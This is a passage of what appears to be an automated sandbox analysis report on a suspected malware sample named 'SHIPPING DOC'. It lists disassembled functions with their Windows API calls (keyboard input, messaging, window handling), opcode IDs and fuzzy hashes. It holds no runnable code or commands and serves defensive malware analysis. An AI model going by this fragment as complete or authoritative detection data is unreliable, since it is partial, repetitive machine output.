                                                                                                                      • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1612042205-0
                                                                                                                      • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                                                                      • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                                      • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                                                                      • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove_strncmp
                                                                                                                      • String ID: >$U$\
                                                                                                                      • API String ID: 2666721431-237099441
                                                                                                                      • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                      • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                                      • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                      • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                                      • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                                      • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                                      • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                                      • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2221674350-0
                                                                                                                      • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                      • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                                      • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                      • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2037614760-0
                                                                                                                      • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                                      • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                                      • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                                      • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                      • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                      • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                      • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 960795272-0
                                                                                                                      • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                      • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                                      • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                      • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                                      APIs
                                                                                                                      • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                      • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4189319755-0
                                                                                                                      • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                      • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                                      • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                      • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                                      • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1976402638-0
                                                                                                                      • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                      • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                                      • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                      • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 642888154-0
                                                                                                                      • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                      • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                      • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                      • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Copy$ClearErrorLast
                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                      • API String ID: 2487901850-572801152
                                                                                                                      • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                      • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                      • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                      • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Show$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1871949834-0
                                                                                                                      • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                      • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                      • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                      • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                      • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                      • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                      • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                      APIs
                                                                                                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                      • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                      • SendMessageW.USER32 ref: 00471AE3
                                                                                                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3611059338-0
                                                                                                                      • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                      • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                                      • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                      • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1640429340-0
                                                                                                                      • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                      • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                                      • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                      • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                      • _wcslen.LIBCMT ref: 004438CD
                                                                                                                      • _wcslen.LIBCMT ref: 004438E6
                                                                                                                      • _wcstok.LIBCMT ref: 004438F8
                                                                                                                      • _wcslen.LIBCMT ref: 0044390C
                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                                      • _wcstok.LIBCMT ref: 00443931
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3632110297-0
                                                                                                                      • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                      • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                                      • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                      • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
